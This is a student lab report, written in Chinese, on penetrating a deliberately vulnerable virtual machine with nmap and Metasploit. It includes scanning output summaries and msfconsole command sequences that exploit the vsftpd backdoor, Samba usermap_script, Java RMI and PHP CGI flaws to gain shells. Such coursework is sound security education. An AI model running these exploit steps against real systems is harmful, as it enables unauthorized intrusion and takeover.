1.实验内容
1.1 实验要求
(1)掌握metasploit、nmap的用法。
(2)学习前期渗透的方法。
(3)利用4个漏洞,实现对靶机的攻击。
1.2 学习内容
(1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。
(2)四种漏洞的原理:
①Vsftpd源码包后门漏洞:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
②SambaMS-RPC Shell命令注入漏洞:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
③Java RMI SERVER命令执行漏洞:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
④PHP CGI参数执行注入漏洞:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
2.实验目的
通过端口扫描发现靶机漏洞,掌握metasploit的用法,实现多种漏洞的渗透利用。
3.实验过程
3.1 前期渗透
3.1.1 主机发现
在靶机中使用ifconfig得到ip地址为172.16.218.247。
在kali中打开msfconsole,通过输入以下命令来扫描指定网段:
search arp_sweep
use 0
set RHOSTS 192.168.46.0/24
run
根据实验结果我们可以看到我们成功扫描到我们的靶机,其标识为VMware, Inc.,说明这是一台VMware虚拟机。
3.1.2 端口扫描
使用nmap进行端口扫描,通过命令nmap -sS -sV 192.168.46.142进行SYN扫描并进行获取其版本。根据扫描结果我们可以看出靶机上开放了大量的端口,同时存在有很多漏洞。截图如下:
3.1.3 漏洞扫描
通过nmap -script=vuln 192.168.46.142对靶机进行漏洞扫描。扫描结果发现靶机上存在大量漏洞。
对于21端口的FTP服务存在后门漏洞可直接获取root权限,属于高危漏洞,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。截图如下:
对于80端口的HTTP服务存在多种安全漏洞,包括多个路径(如mutillidae/index.php系列页面)存在SQL注入风险,攻击者可通过恶意SQL语句窃取数据或控制服务器;存在Slowloris拒绝服务漏洞(CVE-2007-6750),易被耗尽资源导致服务瘫痪;启用了HTTP TRACE方法,可能引发跨站跟踪(XST)攻击以窃取敏感信息;多个路径(如dvwa/login.php、twiki系列表单)存在跨站请求伪造漏洞,可诱使用户执行非自愿操作;还通过http-enum脚本暴露了twiki、dvwa等应用路径及目录列表,泄露系统结构,属于高危漏洞。
对于1099端口的RMI注册表存在默认配置远程代码执行漏洞,其默认配置允许从远程URL加载类,可导致攻击者执行远程代码,属于高危漏洞。
对于5432端口存在多个高危SSL/TLS漏洞,包括SSL/TLS中间人攻击的CCS注入漏洞(CVE-2014-0224)、可导致明文信息泄露的POODLE漏洞(CVE-2014-3566),以及Diffie-Hellman密钥交换组强度不足的漏洞,这些漏洞可能使攻击者实施中间人攻击、窃取敏感信息、劫持会话,属于高危漏洞。
对于6667端口的IRC服务存在UnrealIRCd恶意后门漏洞,属于被篡改的软件版本,攻击者可通过该后门执行任意命令完全控制服务器,属于高危漏洞。
对于8180端口存在多处漏洞,多个admin路径下的JSESSIONID未设置HttpOnly标志,易被XSS攻击窃取引发会话劫持;存在Slowloris拒绝服务漏洞(CVE-2007-6750),攻击者可耗尽服务器资源致服务瘫痪;同时枚举到大量admin路径及Tomcat管理界面,泄露系统结构,易引发未授权访问等后续风险。
3.2 Vsftpd源码包后门漏洞(21端口)
我们在msfconsole控制台中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.46.142
run
再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功。
3.3 SambaMS-RPC Shell命令注入漏洞(端口139)
我们在msfconsole控制台中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.46.142
run
此时我们可以看到已经获取靶机的shell,攻击成功。
3.4 Java RMI SERVER命令执行漏洞(1099端口)
在前期渗透中已经得知1099端口开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.46.142
run
shell
输入命令whoami,得到结果root,说明攻击成功。
3.5 PHP CGI参数执行注入漏洞(80端口)
我们在msfconsole控制台中输入以下命令
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.46.142
run
shell
可以发现我们能够执行命令,说明攻击成功。
4.遇到的问题及解决方案
问题1:第一次进行漏洞扫描时发现运行命令10分钟后依旧毫无反应
解决方案1:询问AI后发现可能的问题,分别是目标主机未在线或无法访问、访问中可能耗时较长等。我准备一一排查,切换到我的靶机后发现靶机处于休眠状态,不知道这是否有影响,于是我将其唤醒后重新运行指令发现大约1分钟后输出扫描漏洞结果。
5.学习感悟、思考等
通过本次实验,我掌握了 Metasploit 和 Nmap 的使用方法,学习了前期渗透流程,成功利用 Vsftpd 源码包后门、Samba MS-RPC 命令注入、Java RMI SERVER 命令执行、PHP CGI 参数注入这四个不同类型的漏洞实现对靶机的攻击,还解决了漏洞扫描无响应的问题;这让我深刻认识到网络漏洞的潜在风险,理解了渗透测试在安全防护中的关键作用,也明白在网络安全领域需持续学习工具用法与漏洞原理,才能有效防范攻击、保障系统安全。